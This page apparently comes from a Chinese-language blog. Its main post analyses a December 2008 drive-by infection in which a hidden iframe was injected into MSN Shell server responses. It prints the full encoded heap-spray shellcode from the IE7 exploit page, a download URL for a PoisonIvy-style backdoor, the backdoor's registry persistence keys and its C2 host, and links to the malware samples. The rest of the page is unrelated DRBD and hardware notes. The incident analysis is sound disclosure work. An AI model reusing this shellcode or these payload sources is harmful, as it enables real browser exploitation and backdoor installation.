2008-12-24

MSN SHELL 所在SERVER遭ARP掛馬??

2009-03-13 update.
這篇員外 Security: 網站轉址攻擊-ARP掛馬 點出了我在2009-03-11時一個判斷上的盲點,如果是要在網路節點中途攔截,若非使用arp spoofing,除非直接打入router,或是作port mirror過去才行,不然理論上是沒法聽到unicast的tcp封包..(這年頭應該不會有人還在用hub吧,何況是IDC..)
另外附上2008-12-24用wireshark錄到的封包樣本 http://www.swm.idv.tw/20081224_cap.zip 有興趣或是手上有2009-03大規模轉址封包樣本的朋友可以抓回去分析比對看看.

2009-03-12 update.
接到網友專家的來信討論,的確我也感覺之前下的結論過於武斷,由行為模式來看是像機房或是骨幹遭到ARP spoofing,但實際封包模式又不太類似,當然也可能是另一種實作的方式.
不過這些都只是我們由外部現況及有限的證據進行猜測,並沒法接觸到問題的真正核心點.
真相到底是如何?我想除非有核心人士出來爆料..否則很快就會被時間給淹沒了..

2009-03-11 update.
經過目前找到的ARP掛馬工具實測ARP 掛馬的作業模式觀察 之後來觀察ARP掛馬的封包特徵,發現ARP掛馬並不會在gateway之外出現兩個封包,而是直接攔截修改封包插入html資訊,所以此次所發現的異常封包似乎不像目前已知的ARP掛馬,由相關封包特徵來看應該比較接近
大規模網頁綁架轉址:威脅未解除,但專家都猜錯了 這篇的分析結果"IP spoofing"
這種攻擊方式應該屬於網路節點中途攔截並搶先送出假造封包.2008年底發生的這個事件跟2009年三月的大規模轉址非常類似,只是2008年底發生時並沒有引起太大的重視罷了。

*2009-03-09 updat.近日大規模網頁綁架模式似乎與此案例有些類似*

*2008-12-29 update. 下載木馬遭更新*

MSN SHELL是很多人會喜歡用的MSN外掛,因為它提供了訊息加密的功能.不過在今天發現了除了有MSN ACCOUNT洩漏的問題外,更嚴重的還是MSN SHELL所在的蒐集資料SERVER可能遭到ARP掛馬(ARP欺騙劫持掛木馬).所造成的影響恐怕非常巨大..

今天(2008-12-24) 電腦一開機登入MSN後小紅傘就報警
'HTML/Infected.WebPage.Gen [virus]'

看起來是IE的CACHE中有中標的可能,不過因為我沒用IE當BROWSER很久了(都用FireFox),
所以就去查了下IE的CACHE目錄,
發現到報警的gol.htm 如下圖



從這裡可以看到gol.htm 是從 http://shell09.msnshell.com/ 過來的,
而且這個request還會把MSN版本,MSNSHELL版本,語系,及使用的MSN ACCOUNT傳回到 shell09.msnshell.com 這台SERVER上去


在IE CACHE中gol.htm的內容是


在最前面被插了個 長寬都是0的 iframe,連到

http:// 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / i n d e x 3 . h t m (URL用空格處裡了,以免被誤按)
抓下這個 index3.htm來看

明顯就是個掛馬的檔案,我這邊還沒時間去分析它的內容.
看起來像是針對前兩天MS才公佈的IE7漏洞修正.

另外這個IFRAME中連結的60.248.23.20是 台灣的IP,

再來分析為什麼 shell09.msnshell.com (222.73.57.115)會被掛木馬,而且時有時無.

從封包來看
request gol.htm 後回來的第一個封包就被插了iframe


但是http header中的server information是Tiny Httpd.
而接下來的才是正常封包

http header中的server information是 Apache/2.2.4 (Unix)
這才是 shell09.msnshell.com (222.73.57.115)的http server吐出來的封包.

另外再測試 直接 request shell09.msnshell.com (222.73.57.115) 網站根目錄的情況,



也是一樣,先來個TinyHttpd吐出的 iframe然後才是Apache2回應的403

所以推測 MSN SHELL負責收集訊息的 shell09.msnshell.com (222.73.57.115) 這台伺服器所在的機房網段應該是有其他機器中了ARP掛木馬病毒,才會硬插吐iframe出來 ??


有用MSN SHELL的朋友請提高警覺,同時立即進行WINDOWS &病毒碼的UPDAET.否則稍一疏忽就有中標的可能.


後記
1. 60.248.23.20 這台機器是一間台灣公司 "上麥資訊"的機器.
不知道是自己放的木馬還是被當成僵屍?

2. index3.htm 確定是利用前幾天的IE7 0Day漏洞攻擊, 看來現在類似這種的掛馬方式都是出來一份以後大家抄來抄去改來改去的. XD
而其中的
spray(a1+"9090"+"%u8b55%u81ec%ub4c4%ufffe%u60ff%u05eb%u458f%uebe8%ue845%ufff6%uffff%u7468%u7074%u2f3a%u362f%u2e30%u3432%u2e38%u3332%u322e%u2f30%u6174
%u6978%u412f%u7463%u7669%u5865%u652e%u6578%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ud233
%u30b2%u8b64%u8502%u78c0%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u4589%u83fc%u3cc0%u008b%u4503%u83fc%u78c0%u008b
%u4503%u8bfc%u2070%u7503%ue9fc%u0134%u0000%u458f%uc7d8%uf845%u0000%u0000%u7d8b%ufcd8%u28eb%u5756%ub950%uffff%uffff%uc032%uaef2%ud1f7%u4d89%u58f4
%ue85f%u0176%u0000%u758d%u03b8%uf875%u1689%u035e%uf47d%u4583%u04f8%u3f80%u7500%u47d3%u8d57%ub8b5%ufffe%u56ff%uff68%u0000%uff00%uc055%u45c7%u73d8
%u6264%uc72e%udc45%u7865%u0065%u45c7%u00e0%u0000%uc700%ue445%u0000%u0000%u758d%u56d8%ubd8d%ufeb8%uffff%uff57%uc855%u45c7%u75d8%u6c72%uc76d%udc45
%u6e6f%u642e%u45c7%u6ce0%u006c%uc700%ue445%u0000%u0000%u758d%u56d8%u558b%u8dbc%uec7d%u00be%u8860%ub97c%u0006%u0000%ua4f3%u32e8%u0001%u8900
%ufc45%u758d%ubfec%u6000%u7c88%u06b9%u0000%uf300%u5fa4%uff57%ufc75%u7d8d%u64ec%u04a1%u0000%u8900%u6407%u08a1%u0000%u8900%u0447%uc764%u0405
%u0000%u0000%u8860%u647c%u05c7%u0008%u0000%u6000%u7c88%u55ff%u89b8%ub485%ufffe%u8dff%uec75%u068b%ua364%u0004%u0000%u468b%u6404%u08a3%u0000
%u6a00%u6a00%u8d00%ub8bd%ufffe%u57ff%u75ff%u6ae8%uff00%ub495%ufffe%u6aff%u8d00%ub8b5%ufffe%u56ff%u55ff%u6acc%uff00%ud055%uc7e8%ufffe%u47ff%u7465%u7250
%u636f%u6441%u7264%u7365%u0073%u6f4c%u6461%u694c%u7262%u7261%u4179%u4700%u7465%u6554%u706d%u6150%u6874%u0041%u736c%u7274%u656c%u416e%u6c00
%u7473%u6372%u7461%u0041%u6957%u456e%u6578%u0063%u7845%u7469%u7250%u636f%u7365%u0073%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c
%u0041%u56eb%u508b%u5718%u5251%u8b56%u0336%ufc75%uf3fc%u5ea6%u595a%u745f%u8306%u04c6%u754a%u8be8%u1848%uca2b%ue1d1%u508b%u0324%ufc55%ud103
%uc933%u8b66%ud10a%ud1e1%u8be1%u1c50%u5503%u03fc%u8bd1%u0312%ufc55%uff5b%u58e3%u00b9%u8860%u517c%u01c6%u8968%u0141%u41c6%uc305%ue2ff");這一長串,解開後可以在裡面發現藏了下載的URL ,

h t t p : / / 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / A c t i v e X . e x e (為避免意外發生,一樣在每個字元中間加了個空格)
改天有空在來研究下牠到底幹了些啥

3. 抓下來的ActiveX.exe 丟到 Virustotal 上的分析報告

File ActiveX.exe received on 12.24.2008 17:25:37 (CET)
Current status:finished Result: 9/39 (23.08%)

AntivirusVersionLast UpdateResult
a-squared4.0.0.732008.12.24-
AhnLab-V32008.12.25.02008.12.24-
AntiVir7.9.0.452008.12.24-
Authentium5.1.0.42008.12.24W32/PoisonIvy.E.gen!Eldorado
Avast4.8.1281.02008.12.24-
AVG8.0.0.1992008.12.24BackDoor.PoisonIvy
BitDefender7.22008.12.24Trojan.Downloader.Agent.ZCR
CAT-QuickHeal10.002008.12.24-
ClamAV0.94.12008.12.24-
Comodo8092008.12.24-
DrWeb4.44.0.091702008.12.24-
eSafe7.0.17.02008.12.24-
eTrust-Vet31.6.62762008.12.24-
Ewido4.02008.12.24-
F-Prot4.4.4.562008.12.24W32/PoisonIvy.E.gen!Eldorado
F-Secure8.0.14332.02008.12.24W32/PoisonIvy.gen22
Fortinet3.117.0.02008.12.24-
GData192008.12.24Trojan.Downloader.Agent.ZCR
IkarusT3.1.1.45.02008.12.24-
K7AntiVirus7.10.5642008.12.24-
Kaspersky7.0.0.1252008.12.24-
McAfee54732008.12.23-
McAfee+Artemis54732008.12.23-
Microsoft1.42052008.12.24Backdoor:Win32/Poisonivy.E
NOD3237162008.12.24-
Norman5.80.022008.12.24W32/PoisonIvy.gen22
Panda9.0.0.42008.12.24-
PCTools4.4.2.02008.12.24-
Prevx1V22008.12.24-
Rising21.09.22.002008.12.24Trojan.Win32.Undef.vir
SecureWeb-Gateway6.7.62008.12.24-
Sophos4.37.02008.12.24-
Sunbelt3.2.1809.22008.12.22-
Symantec102008.12.24-
TheHacker6.3.1.4.1992008.12.23-
TrendMicro8.700.0.10042008.12.24-
VBA323.12.8.102008.12.24-
ViRobot2008.12.24.15342008.12.24-
VirusBuster4.5.11.02008.12.24-

Additional information
File size: 11776 bytes
MD5...: 68fb7e446198055cece63ae002065f98
SHA1..: f3528e710b6e73741fca0d5ffb4f31022616ab30
SHA256: 8e25f68a836b0c562cd575ff3b56f2073df4414d102eb97e0cf79a7c5423340b
SHA512: 9a456f53c90685f24eab8da8bfd95ce959b6f582831f5ec7f8598ba135844311
f782fabd1d8a33f582f860426b24915b4f3fec24f2bbb81fa417ce03a59a7876
ssdeep: 192:p3yFbGZTscP4oyn+5MYNmtNJD5UxMpuYGunUQGdD4RxvjqbqUA2cm4RX2Q3M
7Sfr:JOGZYi4o5MYNAJD5UyuYVnUQG9axvjqW
PEiD..: Armadillo v1.71
TrID..: File type identification
Win32 Executable Generic (42.3%)
Win32 Dynamic Link Library (generic) (37.6%)
Generic Win/DOS Executable (9.9%)
DOS Executable Generic (9.9%)
Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x4013c0
timedatestamp.....: 0x49503e0f (Tue Dec 23 01:25:35 2008)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x515 0x600 5.28 4bdf9e12b88dc8c76c7e22d733e4e4e4
.rdata 0x2000 0x2b4 0x400 3.42 9480d3dc61527ddfacb7fb9373fbcc60
.data 0x3000 0x1e60 0x2000 7.82 984d3ad35e502800c4b95c340aeb5ae4

( 2 imports )
> MSVCRT.dll: _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _controlfp, _initterm, __getmainargs, __p___initenv, exit, _XcptFilter, _exit, __CxxFrameHandler, _except_handler3, __3@YAXPAX@Z
> KERNEL32.dll: lstrcpyA, lstrcatA, CreateFileA, WriteFile, CloseHandle, WinExec, ExitProcess, GetModuleFileNameA

看來檢出率還不是很高

4. 2008-12-26. 從這兩天的訪客來源看,有不少是搜 60.248.23.20 & gol.htm 過來的,看來已經有不少人都發現這情況了吧.

5. 抓下來的ActiveX.exe 我在封閉環境測試執行後會生出 C:\WINDOWS\system32\mftp.exe & 123.bat(這是run完後把自己幹掉的batch檔),然後在HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 底下生出一個名稱是 svchost.exe 的啟動執行項目去執行 C:\WINDOWS\system32\mftp.exe ,不過奇怪的是 mftp.exe 跟 ActiveX.exe 是一模一樣的檔案(比對MD5SUM完全相同),好像也沒看到做其他事情..可能需要再進一步分析..

6. 2008-12-27 目前60.248.23.20這台機器似乎是無法連線了,不知是已經發現處裡了還是無法負荷過量的連線需求,在 2008-12-24該台機器還能連線時我有測試過,那是台Windows 2000的機器.

7. http://www.swm.idv.tw/60.248.23.20_torjan.zip 這是從2008-12-25 從 http:// 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / i n d e x 3 . h t m & h t t p : / / 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / A c t i v e X . e x e 抓下來的檔案,解壓縮密碼為 60.248.23.20 ,有興趣者可以抓回去研究研究 (!!小心!!)

8.2008-12-28 目前這個ARP掛木馬iframe index3.htm 的災情似乎有擴大的趨勢,現在已知受影響的站點還有 forum.vbulletin-china.cn (125.89.79.139), 也是一樣應該是受到ARP綁架掛馬的波及.

9.2008-12-29 update
拿nmap掃了下 60.248.23.20 這台機器 (Windows 2000)
發現有開啟的port如下
Discovered open port 3389/tcp on 60.248.23.20 Windows RDP
Discovered open port 21/tcp on 60.248.23.20 FTP
Discovered open port 8888/tcp on 60.248.23.20 ????
Discovered open port 5800/tcp on 60.248.23.20 VNC-HTTP
Discovered open port 5900/tcp on 60.248.23.20 VNC
Discovered open port 1433/tcp on 60.248.23.20 MS-SQL
估計是沒人管的機器被當黑進去利用了

今天測試 h t t p : / / 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / A c t i v e X . e x e 這個檔案居然有改版了, 之前抓下來的是
ActiveX.exe 2008-12-23 09:25 11776 bytes md5sum:68fb7e446198055cece63ae002065f98
今天發現已經換成新的了
ActiveX.exe 2008-12-26 15:07 12800 bytes md5sum:4405441a2b01ad5fce015cdd5a8c80fe
這個檔會被我裝的小紅傘攔截到TR/Dldr.Agent.12800.3 [trojan].(先前的不會), 估計先前那個是拿來做實驗不然就是沒寫好的.
把他丟到 Virus.Org 去分析 (因為virustotal好像掛了)

The following represents the test results from the virus scanners used by the Virus.Org scanning service when it performed the scan on the file 'ActiveX.exe_20081229_TORJAN'.

File: ActiveX.exe_20081229_TORJAN
SHA-1 Digest: 9ad1f1b647d6266a2a7dd4e7ee5b1d091bc7ce7f
Size: 12800 bytes
Detected Packer: Microsoft Visual C++ v5.0/v6.0 (MFC)
Status: Infected or Malware (Confidence 30.43%)
Date Scanned: Mon Dec 29 12:03:22 +0000 2008

Scanner Scanner Version Scanner Engine Scanner Signatures Result Scan Time
A-Squared 4.0.0.29 N/A 1230552006 Clean 30.88 secs
Arcavir 1.0.5 N/A 14:07 13-12-2008 Clean 21.83 secs
avast! 1.0.8 N/A 081228-0 Win32:Rootkit-gen 73.27 secs
AVG Anti Virus 7.5.52 442 270.10.1/1867 Clean 70.36 secs
Avira AntiVir 2.1.12-100 7.9.0.45 7.1.1.45 TR/Dldr.Agent.12800.3 107.02 secs
BitDefender 7.81008 7.22837 2390111 Trojan.Downloader.Agent.ZCR 23.78 secs
CA eTrust N/A 31.06.00 31.06.6274 Clean 21.35 secs
CAT QuickHeal 10.00 N/A 29 December, 2008 Clean 77.78 secs
Comodo 3.0 3.0 834.4321976 Clean 10.70 secs
CPSecure 1.15 1.1.0.715 26/12/2008 10:37AM Clean 101.28 secs
Dr. Web 4.44.0.10060 4.44.0.9170 494777 Clean 73.74 secs
F-PROT 4.6.8 3.16.16 20 November 2008 Clean 62.52 secs
F-PROT 6 6.2.1.4252 4.4.4.56 200812282035 W32/PoisonIvy.E.gen!Eldorado 32.33 secs
F-Secure 1.10 6392 2008-12-29_03 Backdoor.Win32.Poison.ous [AVP] 94.35 secs
Ikarus T3SCAN 1.32.4.0 1.01.45 2008-12-29 04:57:50 Clean 108.05 secs
Kaspersky 5.7.13 1367201 29-12-2008 Backdoor.Win32.Poison.ous 211.55 secs
McAfee Virusscan 5.30.0 5.3.00 v5477 Clean 51.25 secs
Norman Virus Control 7.00.00 5.93.01 5.93.00 Clean 175.55 secs
Panda 9.04.03.0001 1847194 28/12/2008 Clean 26.53 secs
Sophos Sweep 4.36.0 2.81.2 4.36 Clean 63.30 secs
Trend Micro N/A 8.700-1004 736 TROJ_POISON.LO 10.59 secs
VBA32 3.12.8.10 N/A 2008.12.28 Clean 54.87 secs
VirusBuster 2005 1.3.4 4.3.23:9 9.144.53/11.0 Clean 44.53 secs



而這個新的 h t t p : / / 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / A c t i v e X . e x e 如果被下載執行了以後,會發生的動作如下
a.將自己複製一份到 C:\WINDOWS\system32\svahost.exe
b.在registry的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
新建一筆開機執行
"svchost"="C:\\WINDOWS\\system32\\svahost.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6605C18D-7259-D9DB-F7B2-7EF7712E0D2A}
"StubPath"="C:\\WINDOWS\\system32\\svahost.exe"

c.紀錄所有執行程式&滑鼠鍵盤動作in C:\\WINDOWS\\system32\\svahost 紀錄內容如下
=================================================================
trlAltCtrlAlt??    * - WINDOWSsysum 2Num 8Num 6Enter?sva?    +  KVMware Accelerated AMD PCNet Adapter (Microsoft's Packet Scheduler) : Capturing - Wiresharkum 2Num 2Num 2Num 2??    -  m 匯出登錄檔案aaa?    - + ?aaa.reg - 記事本trl?
=================================================================
d.試圖連線到 lovepi.8800.org tcp_port 80 (121.10.214.100[廣東汕头市])

很明顯就是一隻木馬程序.

10. 2008-12-31 update. 那隻新的 h t t p : / / 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / A c t i v e X . e x e 已經有專業分析報告出來了

11. 2009-01-02 update. Google 搜尋 60.248.23.20 那個木馬頁面能被搜到了, 囧~~


而那個 http://60.248.23.20/taxi/index3.htm 中的特徵
var mystr ="http://rਊr.book.com";
可以從GOOGLE用 rਊr 搜尋 會有原理介紹.
Virus Total 針對 index3.htm的解析報告 ActiveX.exe的解析報告

12. 2009-03-09 update. 最近(2009三月初)爆出cnet/msn taiwan也有出現莫名轉址的情況,
這陣子因為雜務過多沒花太多時間去追這次大規模轉址攻擊的相關證據,不過由網上有人擷取到封包來看,也是第一個http回應封包前面被插了iframe,跟之前發現的模式很相近.
去年(2008)聖誕節前後的事件因為受影響的網站知名度普遍不夠高,所以並沒有引起廣泛的重視..相關資訊去GOOGLE搜尋 60.248.23.20 可以找到一些受害者的資料.
如果還不知道什麼是ARP掛馬,請GOOGLE一下吧
GOOGLE找 ARP+掛馬 結果是 約有102,000項符合ARP 掛馬的查詢結果,可是把搜尋範圍鎖定在台灣的網頁,就只有469項符合ARP 掛馬的查詢結果.
ARP掛馬前兩年在中國的IDC裡面老早就被人玩爛了,很訝異台灣居然討論的人那麼少.
不過就算真的是IDC裡面某台機器有問題成為掛馬的元兇,應該也會在發現後湮滅掉證據,真正的實情如何我想應該是不會被公開出來的,各位專家就繼續猜吧~~XD

13. 2009-03-11 update. ARP 掛馬的作業模式觀察
由目前找到的ARP掛馬工具實測並觀察封包模式之後來看,ARP掛馬並不會在gateway之外出現兩個封包,所以這種攻擊方式應該比較屬於網路節點中途攔截並搶先送出假造封包.

14.2009-03-12 update.
接到網友專家的來信討論,的確我也感覺之前下的結論過於武斷,由行為模式來看是像機房或是骨幹遭到ARP spoofing,但實際封包模式又不太類似,當然也可能是另一種實作的方式.
不過這些都只是由外部現況及有限的證據進行猜測,並沒法接觸到問題的核心點.
真相到底是如何?我想除非有核心人士出來爆料..否則很快就會被時間給淹沒了..

15.2009-03-13 update.
這篇員外 Security: 網站轉址攻擊-ARP掛馬 點出了我在2009-03-11時的一個判斷上的盲點,如果是要在網路節點中途攔截,若非使用arp spoofing,除非直接打入router,或是作port mirror過去才行,不然理論上是沒法聽到unicast的tcp封包..(這年頭應該不會有人還在用hub吧,何況是IDC..)
另外附上2008-12-24用wireshark錄到的封包樣本 http://www.swm.idv.tw/20081224_cap.zip 有興趣或是手上有2009-03大規模轉址封包樣本的朋友可以抓回去分析比對看看.

2008-10-04

2008-10-04 這幾年敗家到現在殘存下來的CPU/RAM

這是目前挖的出來的殘骸..CPU / RAM


486DX-33


486DX4-100


AMD5x86-P75 (486 DX-133)


AMD-K5 PR100


Celeron 533A


Celeron 950


P4-2.8G


還有好幾顆Cpu是送人/挪作他用..沒留下來..
包含第一台PC用的386-sx33(不知道到哪去了)..
Intel Slot 1的(忘記是多少的了)
超頻經典 P2-賽揚 333
amd k6-2 400 (記得那時候超好用,搞了三顆還搭水冷咧)現在也找不到了 ,
還有AMD Althon 850,AMD Barton 2500....

2008-10-02

DRBD on Debian 上的建置與實測筆記

這是DRBD (Distributed Replicated Block Device) 在DEBIAN上的建置筆記與簡單測試過程的紀錄
整個測試環境是在VMware Server 1.07 build-108231 上
Host配置:
OS- Windows 2003 R2 Enterprise with SP2
CPU- Intel Q6600 2.4GHz
RAM- DDR2-800 2GB *4 = 8GB
HDD- Seagete ST3500320AS *2 with ICH9 AHCI
VM所使用的分區為 Windows Software Raid-0

Guest配置:
OS- Debian 4.0 etch [Kernel:2.6.18-6-686 (2.6.18.dfsg.1-22etch2)]
CPU- 由VM分兩顆Processors出來
RAM- 512MB
HDD- 8G scsi with Independent-persistent
Eth0- Bridged
Eth1- Host-Only #DRBD獨立內網資料交換用

以下皆以Guest為實際操作/測試標的
先準備好兩個相同的VM環境:NODE-A,NODE-B
(可以在 Debian 基本安裝完以後直接把硬碟檔.vmdk複製過去然後修改設定比較節省時間)
硬碟分割:
/dev/sda1 256M /boot #FS:ext3
/dev/sda2 7.7G LVM #作為LVM的PV,屬於VG0
/dev/sda3 512M swap
LVM:
/dev/VG0/LVROOT 4G / #FS:XFS 系統根目錄,測試就懶得細分了
/dev/VG0/LVDRBD 2G /DRBD #測試DRBD用

網路設定
NODE-A
eth0 192.168.1.101 #bridged HOST的網卡,可連外
eth1 192.168.100.101 #Host-Only 網段網卡,作為DRBD交換資料用
NODE-B
eth0 192.168.1.102 #bridged HOST的網卡,可連外
eth1 192.168.100.102 #Host-Only 網段網卡,作為DRBD交換資料用

安裝/測試步驟:
1.設定APT的Sources List
在NODE-A先將 Backports 加進/etc/apt/sources.list中,這樣才有DRBD8可以用(etch本身提供的是drbd0.7,有點舊了)
==================================
NODE-A# echo "deb http://www.backports.org/debian etch-backports main" >>/etc/apt/sources.list
==================================
因為 Backports的GPG在做apt-get update時會出現
==================================
W: GPG error: http://www.backports.org etch-backports Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY EA8E8B2116BA136C
W: You may want to run apt-get update to correct these problems
==================================
所以需要把它的PGP匯入
NODE-A# gpg --keyserver hkp://subkeys.pgp.net --recv-keys 16BA136C
NODE-A# gpg --export | apt-key add -
之後就能正常進行 apt-get update 了

2.安裝drbd8 (source & utils)
NODE-A# apt-get install drbd8-source drbd8-utils
同時會把所有需要的相依套件都裝進去

3.產生drbd8 kernel module
brdb8-source裝完後會在 /usr/src/drbd8.tar.bz2
把它解開
NODE-A# cd /usr/src ; tar jxvf /usr/src/drbd8.tar.bz2
使用 module-assistant 來編譯 drbd8 的kernel module
NODE-A# module-assistant auto-install drbd8
也會自動把所有編譯過程中需要的相依套件自動裝進去,編譯完以後自動安裝
同時產出的 kernel module 會在 /usr/src/drbd8-2.6.18-6-686_8.0.13-2~bpo40+1+2.6.18.dfsg.1-22etch2_i386.deb (檔名會視現行KERNEL版本編號而異)

4.從NODE-A把編好的kernel module & drbd8-utils 直接丟到NODE-B去安裝,省得再NODE-B上還要把相同步驟再搞一次
/usr/src/drbd8-2.6.18-6-686_8.0.13-2~bpo40+1+2.6.18.dfsg.1-22etch2_i386.deb #drbd8 kernel module
/var/cache/apt/archives/drbd8-utils_2%3a8.0.13-2~bpo40+1_i386.deb #從apt的cache archives裡面把drbd8-utils翻出來
在NODE-B上直接用 dpkg -i 把它裝進去就好了(前提是NODE-A & NODE-B的Kernel是一樣的)
NODE-B# dpkg -i drbd8-2.6.18-6-686_8.0.13-2~bpo40+1+2.6.18.dfsg.1-22etch2_i386.deb drbd8-utils_2%3a8.0.13-2~bpo40+1_i386.deb

5.設定/etc/drbd.conf
測試用基礎設定,就依照原本安裝完預設的值的來修改,簡單設定如下
NODE-A & NODE-B : /etc/drbd.conf
==================================
common {
syncer { rate 10M; }
}
resource r0 {
protocol C;
disk { on-io-error detach; }
on NODE-A {
device /dev/drbd0;
disk /dev/VG0/LVDRBD;
address 192.168.100.101:7788;
meta-disk internal;
}
on NODE-B {
device /dev/drbd0;
disk /dev/VG0/LVDRBD;
address 192.168.100.102:7788;
meta-disk internal;
}
}
==================================

6.初始化 resource r0
NODE-A# drbdadm create-md r0
NODE-B# drbdadm create-md r0


7.啟動DRBD service
NODE-A# /etc/init.d/drbd start
NODE-B# /etc/init.d/drbd start

8.檢視DRBD resource r0 狀態
NODE-A# drbdadm state r0
Secondary/Secondary
NODE-B# drbdadm state r0
Secondary/Secondary
=====連線已建立,目前兩個NODE都是Secondary狀態====
NODE-A# cat /proc/drbd
version: 8.0.13 (api:86/proto:86)
GIT-hash: ee3ad77563d2e87171a3da17cc002ddfd1677dbe build by phil@fat-tyre, 2008-08-04 15:28:07
0: cs:Connected st:Secondary/Secondary ds:Inconsistent/Inconsistent C r---
ns:0 nr:0 dw:0 dr:0 al:0 bm:0 lo:0 pe:0 ua:0 ap:0
resync: used:0/61 hits:0 misses:0 starving:0 dirty:0 changed:0
act_log: used:0/257 hits:0 misses:0 starving:0 dirty:0 changed:0
NODE-B# cat /proc/drbd
version: 8.0.13 (api:86/proto:86)
GIT-hash: ee3ad77563d2e87171a3da17cc002ddfd1677dbe build by phil@fat-tyre, 2008-08-04 15:28:07
0: cs:Connected st:Secondary/Secondary ds:Inconsistent/Inconsistent C r---
ns:0 nr:0 dw:0 dr:0 al:0 bm:0 lo:0 pe:0 ua:0 ap:0
resync: used:0/61 hits:0 misses:0 starving:0 dirty:0 changed:0
act_log: used:0/257 hits:0 misses:0 starving:0 dirty:0 changed:0
=====由/proc/drbd 看到的狀態 尚未同步所以是Inconsistent/Inconsistent=====

9.初始化同步r0,將NODE-A設為primary
以NODE-A的資料為基準開始同步
NODE-A# drbdadm -- --overwrite-data-of-peer primary r0
r0所在的/dev/VG0/LVDRBD有2G,首次初始化同步需要點時間,因為在/etc/drbd.conf中設定syncer { rate 10M; } 限制同步最大頻寬使用10MBps(80Mbps),所以2G的資料大概花了三分二十秒左右

同步中在NODE-B上看 /proc/drbd 的資訊
NODE-B# cat /proc/drbd
version: 8.0.13 (api:86/proto:86)
GIT-hash: ee3ad77563d2e87171a3da17cc002ddfd1677dbe build by phil@fat-tyre, 2008-08-04 15:28:07
0: cs:SyncTarget st:Secondary/Primary ds:Inconsistent/UpToDate C r---
ns:0 nr:1842176 dw:1842176 dr:0 al:0 bm:112 lo:0 pe:0 ua:0 ap:0
[================>...] sync'ed: 87.9% (254876/2097052)K
finish: 0:00:23 speed: 10,984 (10,288) K/sec
resync: used:0/61 hits:115023 misses:113 starving:0 dirty:0 changed:113
act_log: used:0/127 hits:0 misses:0 starving:0 dirty:0 changed:0

同步完之後在NODE-A上看 /proc/drbd 的資訊
NODE-A# cat /proc/drbd
version: 8.0.13 (api:86/proto:86)
GIT-hash: ee3ad77563d2e87171a3da17cc002ddfd1677dbe build by phil@fat-tyre, 2008-08-04 15:28:07
0: cs:Connected st:Primary/Secondary ds:UpToDate/UpToDate C r---
ns:2097052 nr:0 dw:0 dr:2097052 al:0 bm:128 lo:0 pe:0 ua:0 ap:0
resync: used:0/61 hits:130938 misses:128 starving:0 dirty:0 changed:128
act_log: used:0/127 hits:0 misses:0 starving:0 dirty:0 changed:0

同步完之後看給DRBD用的網卡eth1
NODE-A:~# ifconfig eth1
eth1 Link encap:Ethernet HWaddr 00:0C:29:68:EC:2C
inet addr:192.168.100.101 Bcast:192.168.100.254 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:659296 errors:0 dropped:0 overruns:0 frame:0
TX packets:1502254 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:47778966 (45.5 MiB) TX bytes:2248845944 (2.0 GiB)
Interrupt:177 Base address:0x1480

NODE-B:~# ifconfig eth1
eth1 Link encap:Ethernet HWaddr 00:0C:29:D3:37:A3
inet addr:192.168.100.102 Bcast:192.168.100.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1502140 errors:12 dropped:18 overruns:0 frame:0
TX packets:659298 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2248686736 (2.0 GiB) TX bytes:47778708 (45.5 MiB)
Interrupt:177 Base address:0x1480

可以看到由NODE-A傳了2G資料給NODE-B

10.於NODE-A(primary)上建立file system,我是用XFS
NODE-A:~# mkfs.xfs /dev/drbd0
meta-data=/dev/drbd0 isize=256 agcount=8, agsize=65532 blks
= sectsz=512 attr=0
data = bsize=4096 blocks=524256, imaxpct=25
= sunit=0 swidth=0 blks, unwritten=1
naming =version 2 bsize=4096
log =internal log bsize=4096 blocks=2560, version=1
= sectsz=512 sunit=0 blks
realtime =none extsz=65536 blocks=0, rtextents=0

11.於NODE-A(primary)上將/dev/drbd0 掛載到 /DRBD 上
NODE-A:~# mount /dev/drbd0 /DRBD
NODE-A:~# df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/VG0-LVROOT
4184064 609632 3574432 15% /
tmpfs 258408 0 258408 0% /lib/init/rw
udev 10240 52 10188 1% /dev
tmpfs 258408 0 258408 0% /dev/shm
/dev/sda1 241116 13240 215428 6% /boot
/dev/drbd0 2086784 288 2086496 1% /DRBD

12.於NODE-A(primary)測試大檔(1G)寫入速度
寫入1G資料到LOCAL DISK上,花了2.69529秒(VM的DISK CACHE加速的嫌疑)
NODE-A:~# dd if=/dev/zero of=/TEST_1G bs=1M count=1000
1000+0 records in
1000+0 records out
1048576000 bytes (1.0 GB) copied, 2.69529 seconds, 389 MB/s
寫入1G資料到DRBD上,花了10.8353秒
NODE-A:~# dd if=/dev/zero of=/DRBD/TEST_1G bs=1M count=1000
1000+0 records in
1000+0 records out
1048576000 bytes (1.0 GB) copied, 10.8353 seconds, 96.8 MB/s

寫入過程中,在NODE-B(secondary)上的CPU使用量
Tasks: 55 total, 3 running, 52 sleeping, 0 stopped, 0 zombie
